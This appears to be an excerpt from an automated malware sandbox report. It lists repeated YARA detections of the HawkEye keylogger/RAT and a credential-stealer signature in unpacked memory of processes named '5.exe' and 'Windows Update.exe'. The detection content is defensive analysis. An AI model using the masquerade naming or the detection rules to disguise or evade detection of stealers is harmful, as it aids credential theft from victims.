          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.0.Windows Update.exe.75c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
